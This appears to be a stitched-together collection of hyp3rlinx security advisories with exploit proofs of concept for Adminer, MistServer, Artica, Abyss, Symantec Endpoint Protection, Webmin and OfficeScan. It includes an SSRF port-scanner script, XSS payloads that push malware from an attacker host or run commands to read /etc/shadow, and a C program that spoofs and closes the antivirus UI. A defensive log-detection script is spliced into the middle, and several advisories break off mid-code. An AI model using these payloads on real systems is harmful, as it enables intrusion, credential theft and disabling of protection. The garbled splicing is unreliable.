Affected versions: 11.1.1.7.0, 11.1.1.7.1, 11.1.1.9.0, 11.1.2.4.0, 12.1.3.0.0, 12.2.1.2.0

References:
http://www.oracle.com/technetwork/security-advisory/cpujan2018-3236628.html

Exploit/POC:
=================
1) Create an evil .WAR or .EAR archive containing ../ in a path name to initiate directory traversal, and inside it a script to execute system commands.
2) Import it into JDeveloper.
3) Files get moved outside the target directories to one of the attacker's choosing.
4) Attacker requests the malicious file contained in the target directory. BAM!

Network Access:
=================
Local

Severity:
=================
Low

Disclosure Timeline:
=================
Vendor Notification: October 14, 2016
Vendor fixes as part of CPU: January 16, 2018
January 17, 2018 : Public Disclosure
Adminer <= v4.3.1 Server Side Request Forgery
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/ADMINER-UNAUTHENTICATED-SERVER-SIDE-REQUEST-FORGERY.txt
[+] ISR: apparition security

Vendor:
=================
www.adminer.org

Product:
=================
Adminer <= v4.3.1

Adminer (formerly phpMinAdmin) is a full-featured database management tool written in PHP. Conversely to phpMyAdmin, it consists of a single file ready to deploy to the target server. Adminer is available for MySQL, PostgreSQL, SQLite, MS SQL, Oracle, Firebird, SimpleDB, Elasticsearch and MongoDB.

https://github.com/vrana/adminer/releases/

Vulnerability Type:
=================
Server Side Request Forgery

CVE Reference:
=================
N/A

Security Issue:
=================
Adminer allows unauthenticated connections to be initiated to arbitrary systems/ports. This vulnerability can be used to potentially bypass firewalls to identify internal hosts and perform port scanning of other servers for reconnaissance purposes.

Funny thing is, Adminer throttles invalid login attempts but allows endless unauthorized HTTP connections to other systems as long as you're not trying to authenticate to Adminer itself.

In situations where Adminer can talk to a server that we are not allowed to (ACL), and where we can talk to the server hosting Adminer, it can do recon for us.

Recently in a LAN I was firewalled off from a server; however, another server running Adminer I can talk to. Also, that Adminer server can talk to the target. Since Adminer suffers from Server-Side Request Forgery, I can scan for open ports and gather information from that firewalled-off protected server. This allowed me to not only bypass the ACL but also hide from the threat detection system (IDS) monitoring east-west connections.

However, sysadmins who check the logs on the server hosting the Adminer application will see our port scans.

root@lamp log/apache2# cat other_vhosts_access.log
localhost:12322 ATTACKER-IP - - [2/Jan/2018:14:25:11 +] "GET ///?server=TARGET-IP:21= HTTP/1.1" 403 1429 "-" "-"
localhost:12322 ATTACKER-IP - - [2/Jan/2018:14:26:24 +] "GET ///?server=TARGET-IP:22= HTTP/1.1" 403 6019 "-" "-"
localhost:12322 ATTACKER-IP - - [2/Jan/2018:14:26:56 +] "GET ///?server=TARGET-IP:23= HTTP/1.1" 403 6021 "-" "-"

Details:
=================
By comparing the different failed error responses from Adminer when making bogus SSRF connections, I figured out which ports are open/closed.

Port open   ==> Lost connection to MySQL server at 'reading initial communication packet
Port open   ==> MySQL server has gone away
Port open   ==> Bad file descriptor
Port closed ==> Can't connect to MySQL server on '';
Port closed ==> No connection could be made because the target machine actively refused it
Port closed ==> A connection attempt failed.

This worked so well for me I wrote a quick port scanner, 'PortMiner', as a proof of concept that leverages the Adminer SSRF vulnerability.

PortMiner observations:
=================
No response / 'read operation timed out' means the port is possibly open or filtered and should be given a closer look if possible. This seems to occur when scanning web server ports like 80, 443. However, when we get error responses like the ones above from the server we can be fairly certain a port is either open or closed.

Quick POC:

echo -e 'HTTP/1.1 200 OK\r\n\r\n' | nc -l -p

Use range -

Exploit/POC:
=================

import socket,re,ssl,warnings,subprocess,time
from platform import system as system_name
from os import system as system_call

#Adminer Server Side Request Forgery
#PortMiner Scanner Tool
#by John Page (hyp3rlinx)
#ISR: ApparitionSec
#hyp3rlinx.altervista.org
#=================
#D1rty0Tis says hi.

#timeout
MAX_TIME=32

#ports to log
port_lst=[]

#Web server response often times out but usually means ports open.
false_pos_ports=['80','443']

BANNER=''' _ __ __ _ | _ \ | | | \/ (_) | |__) |__ _ __| |_| \ / |_ _ __ ___ _ __ | ___/ _ \| '__| __| |\/| | | '_ \ / _ \ '__| | | | (_) | | | |_| | | | | | | | __/ | |_| \___/|_| \__|_| |_|_|_| |_|\___|_| '''

def info():
    print "\nPortMiner depends on Error messages to determine open/closed ports."
    print "Read operations reported 'timed out' may be open/filtered.\n"

def greet():
    print 'Adminer Unauthenticated SSRF Port Scanner Tool'
    print 'Targets Adminer used for MySQL administration\n'
    print 'by hyp3rlinx - apparition security'
    print '
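The scans the Adminer advisory above sees in other_vhosts_access.log, and the MailConnect requests in the D-Link CWM-100 SSRF advisory earlier on this page, leave the same kind of trace on the server being used as the pivot. As an added example (not part of either advisory), the Python 3 script below pulls both request shapes out of Apache-style access logs, flags a client that probes several ports on one target within a short window, and separately flags any probe aimed at loopback or RFC 1918 space; the log lines, addresses and thresholds are constructed for the example.

```python
import ipaddress
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample log (not taken from either advisory): three Adminer
# requests in Apache other_vhosts_access format, two D-Link CWM-100
# MailConnect requests in plain combined format, and one unrelated hit.
SAMPLE_LOG = """\
localhost:12322 198.51.100.5 - - [02/Jan/2018:14:25:11 +0000] "GET /?server=203.0.113.9:21&username= HTTP/1.1" 403 1429 "-" "-"
localhost:12322 198.51.100.5 - - [02/Jan/2018:14:26:24 +0000] "GET /?server=203.0.113.9:22&username= HTTP/1.1" 403 6019 "-" "-"
localhost:12322 198.51.100.5 - - [02/Jan/2018:14:26:56 +0000] "GET /?server=203.0.113.9:23&username= HTTP/1.1" 403 6021 "-" "-"
198.51.100.7 - - [02/Jan/2018:15:00:01 +0000] "GET /index.php/System/MailConnect/host/127.0.0.1/port/22/secure/ HTTP/1.1" 200 2 "-" "-"
198.51.100.7 - - [02/Jan/2018:15:00:02 +0000] "GET /index.php/System/MailConnect/host/127.0.0.1/port/445/secure/ HTTP/1.1" 200 2 "-" "-"
198.51.100.8 - - [02/Jan/2018:15:10:00 +0000] "GET /index.php HTTP/1.1" 200 512 "-" "-"
"""

# One access-log line, with an optional "vhost:port " prefix (other_vhosts format).
LINE_RE = re.compile(
    r'^(?:\S+\s+)?(?P<client>\d{1,3}(?:\.\d{1,3}){3}) \S+ \S+ '
    r'\[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*"')

# Request shapes from the two advisories: Adminer's server=HOST:PORT query
# parameter and CWM-100's /System/MailConnect/host/HOST/port/PORT/ path.
PROBE_PATTERNS = (
    ('adminer', re.compile(r'[?&]server=(?P<host>[^:&/]+):(?P<port>\d{1,5})')),
    ('dlink-cwm', re.compile(r'/System/MailConnect/host/(?P<host>[^/]+)/port/(?P<port>\d{1,5})')),
)

# Address space that an externally reachable web app should never be asked to
# connect into: loopback plus RFC 1918 (listed explicitly, not via is_private).
INTERNAL_NETS = [ipaddress.ip_network(n) for n in
                 ('127.0.0.0/8', '10.0.0.0/8', '172.16.0.0/12', '192.168.0.0/16')]


def extract_probes(log_text):
    """Return one dict per request that asks the server to connect somewhere."""
    probes = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        for product, rx in PROBE_PATTERNS:
            pm = rx.search(m.group('path'))
            if pm:
                probes.append({
                    'client': m.group('client'),
                    'host': pm.group('host'),
                    'port': int(pm.group('port')),
                    'ts': datetime.strptime(m.group('ts'), '%d/%b/%Y:%H:%M:%S %z'),
                    'product': product,
                })
                break
    return probes


def detect_scans(probes, window=timedelta(minutes=5), min_ports=3):
    """Flag (client, target) pairs that touched >= min_ports distinct ports
    inside any span of length `window`. Returns {(client, target): ports}."""
    by_pair = defaultdict(list)
    for p in probes:
        by_pair[(p['client'], p['host'])].append(p)
    alerts = {}
    for pair, events in by_pair.items():
        events.sort(key=lambda e: e['ts'])
        start = 0
        for end in range(len(events)):
            # Advance the window start until events[start..end] fits in `window`.
            while events[end]['ts'] - events[start]['ts'] > window:
                start += 1
            if len({e['port'] for e in events[start:end + 1]}) >= min_ports:
                alerts[pair] = sorted({e['port'] for e in events})
                break
    return alerts


def internal_targets(probes):
    """Probes aimed at loopback or RFC 1918 space. Even one matters: it means
    the server was used as a pivot behind the firewall (the CWM-100 127.0.0.1 case)."""
    hits = set()
    for p in probes:
        try:
            ip = ipaddress.ip_address(p['host'])
        except ValueError:      # a hostname rather than a literal address
            continue
        if any(ip in net for net in INTERNAL_NETS):
            hits.add((p['client'], p['host'], p['port']))
    return sorted(hits)


if __name__ == '__main__':
    found = extract_probes(SAMPLE_LOG)
    for (client, target), ports in detect_scans(found).items():
        print('port sweep: %s -> %s ports %s' % (client, target, ports))
    for client, host, port in internal_targets(found):
        print('internal pivot: %s -> %s:%d' % (client, host, port))
```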
CVE-2017-16884 Mist Server v2.12 Unauthenticated Persistent XSS (hyp3rlinx / ApparitionSec)
[+] Credits: John Page (aka Hyp3rlinX)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/MIST-SERVER-v2.12-UNAUTHENTICATED-PERSISTENT-XSS-CVE-2017-16884.txt
[+] ISR: ApparitionSec

Vendor:
=================
mistserver.org

Product:
=================
MistServer v2.12

MistServer is a full-featured, next-generation streaming media toolkit for OTT (internet streaming).

Vulnerability Type:
=================
Unauthenticated Persistent XSS

CVE Reference:
=================
CVE-2017-16884

Security Issue:
=================
Unauthenticated remote attackers can inject persistent XSS payloads by making failed HTTP authentication requests. Attacker supplied payloads will get stored in the server logs as failed authentication request alerts. MistServer echoes back the unsanitized payloads in MistServer's web interface automatically, due to the automatic refresh of the UI every few seconds, thereby executing arbitrary attacker supplied code.

References:
https://news.mistserver.org/news/78/Stable+release+2.13+now+available%21

Exploit/POC:
=================

import requests

#INJECT IFRAME
requests.get('http://VICTIM-IP:4242/admin/api?callback=={"authorize":{"password":"666","username":;http://ATTACKER-IP\'>"}}')

#PUSH MALWARE
requests.get('http://VICTIM-IP:4242/admin/api?callback=={"authorize":{"password":"666","username":;http://ATTACKER-IP/bad.exe\'>"}}')

#EXFIL LOGS
requests.get('http://VICTIM-IP:4242/admin/api?command={"authorize":{"password":"666","username":;alert(document.body.innerHTML)"}}')

Network Access:
=================
Remote

Severity:
=================
High

Disclosure Timeline:
=================
Vendor Notification: October 19, 2017
Vendor Acknowledgement : October 20, 2017
Vendor Released Fix : November 30, 2017
December 1, 2017 : Public Disclosure
CVE-2017-17055 Artica Web Proxy v3.06 Remote Code Execution (hyp3rlinx / ApparitionSec)
[+] Credits: John Page (aka Hyp3rlinX)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/ARTICA-WEB-PROXY-v3.06-REMOTE-CODE-EXECUTION-CVE-2017-17055.txt
[+] ISR: ApparitionSec

Vendor:
=================
www.articatech.com

Product:
=================
Artica Web Proxy v.3.06.112216

Artica Tech offers a powerful but easy-to-use Enterprise-Class Web Security and Control solution, usually the preserve of large companies. ARTICA PROXY Solutions have been developed over the past 10 years as an Open Source Project to help SMEs and public bodies protect both their organizations and employees from risks posed by the Internet.

Vulnerability Type:
=================
Remote Code Execution

CVE Reference:
=================
CVE-2017-17055

Security Issue:
=================
Artica offers a web based command line emulator, 'system.terminal.php' (shell), allowing authenticated users to execute OS commands as root. However, Artica fails to sanitize the HTTP request parameter $_GET["username-form-id"] used in 'freeradius.users.php'. Therefore, when authenticated users click an attacker supplied link or visit a malicious webpage, attacker supplied JavaScript code is executed in their session, which is then used to execute unauthorized operating system commands (RCE) on the affected Artica Web Proxy server by abusing the system.terminal.php functionality. The result is attacker takeover of the Artica server.

Exploit/POC:
=================
1) Steal the Artica server "/etc/shadow" password file.

https://VICTIM-IP:9000/freeradius.users.php?username-form-id=%3C%2Fscript%3E%3Cscript%3Evar%20xhr=new%20XMLHttpRequest();xhr.onreadystatechange=function(){if(xhr.status==200){alert(xhr.responseText);}};xhr.open(%27POST%27,%27https://VICTIM-IP:9000/system.terminal.php%27,true);xhr.setRequestHeader(%27Content-type%27,%27application/x-www-form-urlencoded%27);xhr.send(%27cmdline=cat%20/etc/shadow%27);%3C%2Fscript%3E%3Cscript%3E

2) Write file 'PWN' to the /tmp dir.

https://VICTIM-IP:9000/freeradius.users.php?username-form-id=%3C%2Fscript%3E%3Cscript%3Evar%20xhr=new%20XMLHttpRequest();xhr.onreadystatechange=function(){if(xhr.status==200){alert(xhr.responseText);}};xhr.open(%27POST%27,%27https://VICTIM-IP:9000/system.terminal.php%27,true);xhr.setRequestHeader(%27Content-type%27,%27application/x-www-form-urlencoded%27);xhr.send(%27cmdline=touch%20/tmp/PWN%27);%3C%2Fscript%3E%3Cscript%3E

Network Access:
=================
Remote

Severity:
=================
High

Disclosure Timeline:
=================
Vendor Notification: November 28, 2017
Vendor Confirms Vulnerability : November 28, 2017
Vendor Reply "Fixed in 3.06.112911 / ISO released" : November 29, 2017
December 1, 2017 : Public Disclosure
Abyss Web Server < v2.11.6 Memory Heap Corruption (hyp3rlinx / apparitionsec)
[+] Credits: John Page (aka HyP3rlinX)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/ABYSS-WEB-SERVER-MEMORY-HEAP-CORRUPTION.txt
[+] ISR: ApparitionSec

Vendor:
=================
aprelium.com

Product:
=================
Abyss Web Server < v2.11.6

Vulnerability Type:
=================
Memory Heap Corruption

CVE Reference:
=================
N/A

Security Issue:
=================
It is possible to corrupt heap memory of the Abyss Web Server by sending specially crafted HTML in repeated HTTP POST requests. Users should upgrade to the latest version, v2.11.6.

GetUrlPageData2 (WinHttp) failed: 12002.

FAULTING_IP:
msvcrt!memcpy+5a
75e49b60 f3a5            rep movs dword ptr es:[edi],dword ptr [esi]

EXCEPTION_RECORD:  -- (.exr 0x)
ExceptionAddress: 75e49b60 (msvcrt!memcpy+0x005a)
   ExceptionCode: c005 (Access violation)
  ExceptionFlags:
NumberParameters: 2
   Parameter[0]:
   Parameter[1]: 003b9000
Attempt to read from address 003b9000

CONTEXT:  -- (.cxr 0x0;r)
eax= ebx=075c33f8 ecx=000efd46 edx=0002 esi=075c33b8 edi=0651edb0
eip=77670c52 esp=0651ea70 ebp=0651ea80 iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=0246
ntdll!ZwGetContextThread+0x12:
77670c52 83c404          add     esp,4

PROCESS_NAME:  abyssws.exe

ERROR_CODE: (NTSTATUS) 0xc005 - The instruction at 0x%08lx referenced memory at 0x%08lx. The memory could not be %s.

EXCEPTION_CODE: (NTSTATUS) 0xc005 - The instruction at 0x%08lx referenced memory at 0x%08lx. The memory could not be %s.

EXCEPTION_PARAMETER1:
EXCEPTION_PARAMETER2:  003b9000
READ_ADDRESS:  003b9000

FOLLOWUP_IP:
abyssws+413d9
004413d9 59              pop     ecx

NTGLOBALFLAG:  0
APPLICATION_VERIFIER_FLAGS:  0
APP:  abyssws.exe
ANALYSIS_VERSION: 6.3.9600.17298 (debuggers(dbg).141024-1500) x86fre
LAST_CONTROL_TRANSFER:  from 0043f840 to 75e49b60
FAULTING_THREAD:
BUGCHECK_STR:  APPLICATION_FAULT_ACTIONABLE_HEAP_CORRUPTION_heap_failure_block_not_busy_INVALID_POINTER_READ_PROBABLYEXPLOITABLE
PRIMARY_PROBLEM_CLASS:  ACTIONABLE_HEAP_CORRUPTION_heap_failure_block_not_busy_PROBABLYEXPLOITABLE
DEFAULT_BUCKET_ID:  ACTIONABLE_HEAP_CORRUPTION_heap_failure_block_not_busy_PROBABLYEXPLOITABLE

STACK_TEXT:
777542a8 776cd9bc ntdll!RtlFreeHeap+0x64
777542ac 75e498cd msvcrt!free+0xcd
777542b0 004413d9 abyssws+0x413d9
777542b4 004089d0 abyssws+0x89d0
777542b8 0040a607 abyssws+0xa607
777542bc 0040bd58 abyssws+0xbd58
777542c0 0040cb5b abyssws+0xcb5b

SYMBOL_STACK_INDEX:  2
SYMBOL_NAME:  abyssws+413d9
FOLLOWUP_NAME:  MachineOwner
MODULE_NAME: abyssws
IMAGE_NAME:  abyssws.exe
DEBUG_FLR_IMAGE_TIMESTAMP:  5807a3cb
STACK_COMMAND:  dps 777542a8 ; kb
FAILURE_BUCKET_ID:  ACTIONABLE_HEAP_CORRUPTION_heap_failure_block_not_busy_PROBABLYEXPLOITABLE_c005_abyssws.exe!Unknown
BUCKET_ID:  APPLICATION_FAULT_ACTIONABLE_HEAP_CORRUPTION_heap_failure_block_not_busy_INVALID_POINTER_READ_PROBABLYEXPLOITABLE_abyssws+413d9
ANALYSIS_SOURCE:  UM
FAILURE_ID_HASH_STRING:  um:actionable_heap_corruption_heap_failure_block_not_busy_probablyexploitable_c005_abyssws.exe!unknown
FAILURE_ID_HASH:  {0ba3122b-4351-5a85-a0ea-294a6ce77042}

Followup: MachineOwner
---------

The stored exception information can be accessed via .ecxr.
(2740.30b8): Access violation - code c005 (first/second chance not available)
eax= ebx=075c33f8 ecx=000efd46 edx=0002 esi=075c33b8 edi=0651edb0
eip=77670c52 esp=0651ea70 ebp=0651ea80 iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=0246
ntdll!ZwGetContextThread+0x12:
77670c52 83c404          add     esp,4

0:011> !load winext/msec
0:011> !exploitable
!exploitable 1.6.0.0
Exploitability Classification: PROBABLY_EXPLOITABLE
Recommended Bug Title: Probably Exploitable - Read Access Violation on Block Data Move starting at msvcrt!memcpy+0x0250 (Hash=0xb1db8cd3.0x508907b2)

This is a read access violation in a block data move, and is therefore classified as probably exploitable.

References:
https://aprelium.com/news/abws2-11-6.html

Exploit/POC:
=================
Cause Heap Corruption in Abyss Server.

//Abyss Web Server Memory (heap) Corruption POC
//Discover by hyp3rlinx
//Error code: 0xc374 is STATUS_HEAP_CORRUPTION
//0xc374 - heap has been corrupted.
//=================

window.onerror=function(){ return true }

var target='http://VICTIM-IP:/hosts/host@0/edit/ipcontrol';

function mk_iframe_targets(f){
  var tmp = document.createElement('IFRAME')
  tmp.style='display:none'
  tmp.name='hidden-frame'+f
  return tmp
}

function mk_inputs(id,na
Symantec Endpoint Protection (SEP) v12.1 Tamper-protection Bypass CVE-2017-6331 (hyp3rlinx)
[+] Credits: John Page a.k.a hyp3rlinx [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/CVE-2017-6331-SYMANTEC-ENDPOINT-PROTECTION-TAMPER-PROTECTION-BYPASS.txt [+] ISR: ApparitionSec Vendor: === www.symantec.com Product: === Symantec Endpoint Protection v12.1.6 (12.1 RU6 MP5) Symantec 12.1.7004.6500 Vulnerability Type: === Tamper-Protection Bypass Denial Of Service / Message Spoof CVE Reference: == CVE-2017-6331 SSG16-041 Security Issue: Symantec Endpoint Protection (SEP), does not validate where WinAPI messages comes from (lack of UIPI). Therefore, malware can easily spoof messages to the UI or send WM_SYSCOMMAND to close the SEP UI denying end user ability to scan / run the EP AntiVirus protection. Spoofed messages could also potentially inform a user a scan was clean. Unfortunately Symantecs advisory left out details of the Denial Of Service as well as minimizing the amount of text a malware could inject into the UI which would result in compromising the integrity of the Symantec Endpoint Protection Control Panel user interface. References: === https://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory=security_advisory==20171106_00 Exploit/POC: = 1) Compile below C program, it targets various components of SEP, comment out what you want to send to the UI. 2) Try to open the Symantec Endpoint UI and you will be denied. 3) Or inject attacker supplied messages intructing the user the file is clean etc. #include #include #define VICTIM "DevViewer.exe" //By HYP3RLINX //ISR: ApparitionSec //Symantec EP Protection - Tamper Protection Bypass Vulnerability //Tested successfully on Symantec 12.1.6 (12.1 RU6 MP5) build 7004 Symantec 12.1.7004.6500 Windows 7 //How: FindWindow / SendMessage Win32 API //Impact: DOS / Integrity Compromised //TO-DO: Get Window text for SavUI.exe and DOS to prevent AV scans. 
int main(void){
    while(1){
        //Locate the SEP status window by its title; no UIPI check stops a lower-integrity process doing this.
        HWND hWnd = FindWindow(NULL, TEXT("Status - Symantec Endpoint Protection"));
        if(hWnd!=NULL){
            //This injects arbitrary messages to SEP UI.
            SetWindowText(hWnd, "*** Important Security Update, Visit: http://PWN3D.com/EVIL.exe download and follow instructions. ***");
            //This prevents a user from being able to run AV scans and renders SEP UI useless
            //SendMessage(hWnd, WM_SYSCOMMAND, SC_CLOSE, 0);
        }

        //HWND savUI = FindWindowEx(0, 0, "Symantec Endpoint Protection", 0);

        HWND x = FindWindow(NULL, TEXT("DevViewer"));
        if(x!=NULL){
            SendMessage(x, WM_SYSCOMMAND, SC_CLOSE, 0);
        }

        HWND x2 = FindWindow(NULL, TEXT("DoScan Help"));
        if(x2!=NULL){
            SendMessage(x2, WM_SYSCOMMAND, SC_CLOSE, 0);
        }

        HWND x3 = FindWindow(NULL, TEXT("Sylink Drop"));
        if(x3!=NULL){
            SendMessage(x3, WM_SYSCOMMAND, SC_CLOSE, 0);
        }

        HWND x4 = FindWindow(NULL, TEXT("Manual Scan started on 7/8/2016"));
        if(x4!=NULL){
            SendMessage(x4, WM_SYSCOMMAND, SC_CLOSE, 0);
        }

        Sleep(1000);   //Win32 Sleep() takes milliseconds
    }
    return 0;
}

Network Access:
===============
Local

Severity:
===============
Medium

Disclosure Timeline:
===============
Vendor Notification: July 8, 2016
Vendor acknowledged: 7/14/16
Vendor advisory : November 6, 2017
November 10, 2017 : Public Disclosure

[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx
Webmin v1.850 Remote Code Execution (hyp3rlinx / apparitionsec)
[+] SSD Beyond Security: https://blogs.securiteam.com/index.php/archives/3430
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/WEBMIN-v1.850-REMOTE-COMMAND-EXECUTION.txt
[+] ISR: ApparitionSec

Vulnerability summary
The following advisory describes three (3) vulnerabilities found in Webmin version 1.850.

Webmin is a web-based interface for system administration for Unix. Using any modern web browser, you can set up user accounts, Apache, DNS, file sharing and much more. Webmin removes the need to manually edit Unix configuration files like /etc/passwd, and lets you manage a system from the console or remotely. See the standard modules page for a list of all the functions built into Webmin.

The vulnerabilities found are:
- XSS vulnerability that leads to Remote Code Execution
- CSRF Schedule arbitrary commands
- Server Side Request Forgery

Credit
An independent security researcher, hyp3rlinx, has reported this vulnerability to Beyond Security's SecuriTeam Secure Disclosure program.

Vendor response
The vendor has released patches to address these vulnerabilities. For more information:
https://github.com/webmin/webmin/commit/0c58892732ee7610a7abba5507614366d382c9c9
and http://www.webmin.com/security.html

Vulnerability details

XSS vulnerability that leads to Remote Code Execution
Under the Webmin menu Others/File Manager there is an option to download a file from a remote server ("Download from remote URL"). By setting up a malicious server we can wait for the file download request and then send an XSS payload that leads to Remote Code Execution. Webmin echoes back the status of the file download request, which is where the XSS triggers; the Referer check is bypassed by setting document.domain to the Webmin victim's own IP.
Proof of Concept

import socket

#===
#Run this script and listen for file download from webmin
#Enter payload to execute RCE
#wait for webmin to connect and download file
#Vulnerability is in Menu/Others/File Manager
#issue is webmin echoes back status of the download
#by injecting XSS we bypass the Referer: check by assign
#domain to victims own IP, then execute our RCE
#---
#e.g.
#Download from remote URL
#http://x.x.x.x:1/shell/index.cgi
#> whoami
#root

PORT=int(raw_input("[PORT]> "))        #port we listen on for file download requests
WEBMIN_IP=raw_input("[Webmin IP]> ")   #victim

#Read /etc/shadow file
CMD=("/>document.domain='http://"+WEBMIN_IP+":1/shell/index.cgi'"+
     ""+
     "document.forms[0].submit()")

s = socket.socket()
HOST = ''
s.bind((HOST, PORT))
s.listen(5)

print '\nwebmin file download 0day...'

while True:
    conn, addr = s.accept()
    conn.send(CMD+'\r\n')      #payload is returned as the "downloaded" file body
    print 'Connected!'
    print conn.recv(1024)      #read from the accepted connection, not the listening socket
    conn.close()

s.close()

CSRF Schedule arbitrary commands
User controlled input is not sufficiently sanitized; by sending a GET request to create_job.cgi with the parameter dir=/=ls an attacker can execute arbitrary commands.

Proof of Concept
http://x.x.x.x:1/at/create_job.cgi?user=root=31=7=2017=2=00=/=ls -lt=0

Server Side Request Forgery
User controlled input is not sufficiently sanitized; by sending a GET request to tunnel/link.cgi/http://VICTIM-IP:8000 an attacker can trigger the vulnerability.

Proof of Concept
http://x.x.x.x:1/tunnel/link.cgi/http://VICTIM-IP:8000

Network Access:
===============
Remote

Severity:
===============
High

Disclosure Timeline:
===============
Would like to acknowledge Beyond Security's SSD program for the help with co-ordination of this vulnerability. More details can be found on their blog at:
https://blogs.securiteam.com/index.php/archives/3430
Trend Micro OfficeScan v11.0 and XG (12.0)* Unauthorized NT Domain / PHP Information Disclosures CVE-2017-14085 (apparitionsec / hyp3rlinx)
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/CVE-2017-14085-TRENDMICRO-OFFICESCAN-XG-REMOTE-NT-DOMAIN-PHP-INFO-DISCLOSURE.txt
[+] ISR: ApparitionSec

Vendor:
===============
www.trendmicro.com

Product:
===============
OfficeScan v11.0 and XG (12.0)*

Vulnerability Type:
===============
Unauthorized NT Domain Disclosure
Unauthorized PHP Information Disclosure

OfficeScan protects enterprise networks from malware, network viruses, web-based threats, spyware, and mixed threat attacks. An integrated solution, OfficeScan consists of the OfficeScan agent program that resides at the endpoint and a server program that manages all agents. The OfficeScan agent guards the endpoint and reports its security status to the server. The server, through the web-based management console, makes it easy to set coordinated security policies and deploy updates to every agent.

CVE Reference:
===============
CVE-2017-14085

Security Issue(s):
===============
( NT Domain Disclosure )
Remote unauthenticated attackers who can reach the TrendMicro OfficeScan XG application can query the network's NT domains. NT enumeration is leaked by the web interface when it should not be. Usually you would use NET commands for this, so while this NT enumeration is not high in severity, the interface should not return this information, especially to unauthorized users, as it can aid in launching further attacks.

( PHP Information Disclosure )
Remote unauthenticated attackers that can connect to the TrendMicro OfficeScan XG application can query the PHP version and modules. In "analyzeWF.php" we see get_loaded_extensions() and phpversion() calls, but no session or authentication check is made.

$strAnalyzeResultHeader .= analyzeWFShowItemInfo('Current PHP version: '.phpversion());
$strAnalyzeResultHeader .= analyzeWFShowItemInfo('PHP extensions: '.implode(', ',get_loaded_extensions()));
$strAnalyzeResultHeader .= analyzeWFShowItemInfo('WGF version : '.$strVersion);
etc...
References:
===============
https://success.trendmicro.com/solution/1118372

Exploit/POC (NT Domain Disclosure):
===============
[root@localhost /]# curl -v -k https://VICTIM-IP:4343/officescan/console/RemoteInstallCGI/cgiGetNTDomain.exe
* About to connect() to VICTIM-IP port 4343
* Trying VICTIM-IP... connected
< HTTP/1.1 200 OK
< Pragma: no-cache
< Content-Type: text/plain;charset=utf-8
< Server: Microsoft-IIS/7.5
< X-Powered-By: ASP.NET
< Date: Thu, 01 Jun 2017 15:27:27 GMT
< Connection: close
< Content-Length: 510

{ "ERROR" : { "ERROR_CODE" : 0 },
  "RESPONSE" : { "NODES" : [ { "NAME" : "Avaya" }, { "NAME" : "Km-netprinters" }, { "NAME" : "Mshome" }, { "NAME" : "Printserver" }, { "NAME" : "MyDomain" }, { "NAME" : "Workgroup" }, { "NAME" : "Xpemb" } ] } }

Exploit / POC (PHP Information Disclosure):
===============
c:\> curl -k https://VICTIM-IP:4343/officescan/console/html/widget/repository/widgetPool/wp1/interface/analyzeWF.php

HTTP/1.1 200 OK

[INI_UPDATE_SECTION] >>>> Start Anaylze WGF : 2017-06-02 15:58:26
[INFO] Current PHP version: 7.0.6
[INFO] PHP extensions: Core, bcmath, calendar, ctype, date, filter, hash, iconv, json, mcrypt, SPL, pcre, Reflection, session, standard, mysqlnd, tokenizer, zip, zlib, libxml, dom, PDO, openssl, SimpleXML, xml, wddx, xmlreader, xmlwriter, cgi-fcgi, curl, gmp, ldap, mbstring, Phar, pdo_sqlite, soap, com_dotnet
[INFO] WGF version : 3.8
[INFO] WGF current wp in /path/to/widgetPool/config.php : wp2
[INFO] WGF is /path/to/widgets_new exists : true
[ERROR] C:\Windows\TEMP check read/write permissions : failed To solved this problem please reference document here.
etc...

Network Access:
===============
Remote

Severity:
===============
Medium

Disclosure Timeline:
===============
Vendor Notification: June 2, 2017
Vendor releases fixes / advisory : September 27, 2017
September 28, 2017 : Public Disclosure
Trend Micro OfficeScan v11.0 and XG (12.0)* Unauthorized Server Side Request Forgery (apparitionsec / hyp3rlinx)
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/TRENDMICRO-OFFICESCAN-XG-SERVER-SIDE-REQUEST-FORGERY.txt
[+] ISR: ApparitionSec

Vendor:
===============
www.trendmicro.com

Product:
===============
OfficeScan v11.0 and XG (12.0)*

Vulnerability Type:
===============
Unauthorized Server Side Request Forgery

CVE Reference:
===============
N/A

Security Issue:
===============
Unauthorized LAN attackers that can reach the OfficeScan XG application can make arbitrary HTTP requests to external and internal servers by abusing a Server Side Request Forgery flaw in the "help_Proxy.php" functionality.

Exploit/POC:
===============
https://VICTIM-IP:4343/officescan/console/html/Widget/help_proxy.php?url=http://:8080

python -m SimpleHTTPServer 8080
Serving HTTP on 0.0.0.0 port 8080 ...
- - [31/May/2017 12:21:41] "GET / HTTP/1.1" 200 -

help_proxy.php HTTP response:
{"request_url":"http:\/\/:8080","http_code":200,"flag":1}

Network Access:
===============
Remote

Severity:
===============
Medium

Disclosure Timeline:
===============
Vendor Notification: May 31, 2017
